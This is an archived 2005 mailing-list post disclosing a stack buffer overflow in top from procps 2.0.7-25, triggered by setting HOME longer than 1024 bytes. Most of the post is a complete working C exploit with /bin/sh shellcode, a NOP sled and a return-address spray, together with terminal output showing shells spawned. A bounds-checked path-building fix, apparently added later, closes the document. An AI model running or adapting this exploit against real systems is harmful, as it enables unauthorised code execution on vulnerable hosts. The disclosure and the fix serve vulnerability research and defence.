Vulnerability Development mailing list archives
top (procps-2.0.7-25) vulnerability
From: WINNY THOMAS <winnymthomas () yahoo com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)
While running top on a tool of mine to do a profiling test, the top command ran into a segmentation fault. I could find two instances where the command could misbehave:

1. if you have junk data inside a file .toprc in your home directory
2. if your environment variable HOME is set to a string that's greater than 1024.

I managed to spawn a shell out of the top command by exploiting the second issue. If you compile and run the exploit code which I am including in the mail body you will get a shell. In case you don't, you could pass parameters to the program as follows to adjust the offset. The vulnerability detail is included in the code comment.

[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit

In most of the tests I did on the vulnerable code I got a shell on my system without passing any parameter to the program (that is, the hardcoded offset of 1111 in my program worked well on my system).

/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulnerability: in top.c the function get_options uses strcpy to copy the value of the
 * environment variable HOME into a static buffer that is allocated on the stack. Hence
 * it's possible to apply a standard stack smashing attack to overwrite the return address
 * on the stack and execute code which is of the attacker's choice.
 * NOTE: top is not setuid and hence the exploit won't spawn a root shell.
 * Tested on Red Hat 8 with procps version 2.0.7-25. The problem has
 * been fixed in the latest versions.
 *
 * This code is for educational purpose only and the
 * author shall not bear any responsibility for any
 * damage caused by using this code
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcat */
#include <unistd.h>   /* execl */

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char exploit_variable[1200];

/* Returns the current stack pointer (classic trick: the value is left in %eax). */
long get_esp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    long stackp, retaddr;
    char SETENV[1250];
    long *ptr;
    int i, j, offset = 1111;

    if (argc > 1)
        offset = atoi(argv[1]);
    stackp = get_esp();
    retaddr = stackp - offset;

    /* fill the whole buffer with the guessed return address */
    ptr = (long *)exploit_variable;
    for (i = 0; i < 1200; i += 4)
        *ptr++ = retaddr;
    /* NOP sled in the first 600 bytes, followed by the shellcode */
    for (i = 0; i < 600; i++)
        exploit_variable[i] = '\x90';
    for (j = 0; j < strlen(shellcode); j++, i++)
        exploit_variable[i] = shellcode[j];
    /* terminate the string so strcat stops at the end of the buffer */
    exploit_variable[sizeof exploit_variable - 1] = '\0';

    sprintf(SETENV, "HOME=");
    strcat(SETENV, exploit_variable);
    putenv(SETENV);
    execl("/usr/bin/top", "top", (char *)0);
    return 0;
}
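A bounds-checked version of the HOME-to-rcfile path construction that the comment above describes as the flaw, as an added example that is neither the poster's code nor procps's own; the 1024-byte buffer size (taken from the report's "greater than 1024"), the "/.toprc" suffix and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed from the report: HOME longer than 1024 bytes crashed top. */
#define RC_BUF_SIZE 1024
#define RC_SUFFIX   "/.toprc"

/* Build "<home>/.toprc" into a caller-supplied buffer of out_size bytes.
 * Returns 0 on success, -1 if the result would not fit (NUL included).
 * This replaces the strcpy-into-fixed-stack-buffer pattern the report
 * describes: the length is checked before any byte is copied, so an
 * over-long HOME is rejected instead of overwriting the stack. */
int build_rcfile_path(const char *home, char *out, size_t out_size)
{
    if (home == NULL || out == NULL || out_size == 0)
        return -1;
    size_t need = strlen(home) + strlen(RC_SUFFIX) + 1;
    if (need > out_size)
        return -1;
    /* snprintf is bounded; the check above already rules out truncation. */
    int n = snprintf(out, out_size, "%s%s", home, RC_SUFFIX);
    return (n < 0 || (size_t)n >= out_size) ? -1 : 0;
}

/* Read HOME from the environment and build the rc path, failing closed
 * when HOME is unset or too long rather than falling back to a partial path. */
int rcfile_path_from_env(char *out, size_t out_size)
{
    const char *home = getenv("HOME");
    if (home == NULL)
        return -1;
    return build_rcfile_path(home, out, out_size);
}

int main(void)
{
    char path[RC_BUF_SIZE];
    /* Constructed over-long HOME value, like the one in the report. */
    char big[1300];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    if (build_rcfile_path(big, path, sizeof path) != 0)
        puts("over-long HOME rejected instead of overflowing the buffer");
    if (build_rcfile_path("/home/user", path, sizeof path) == 0)
        printf("rc file: %s\n", path);
    return 0;
}
```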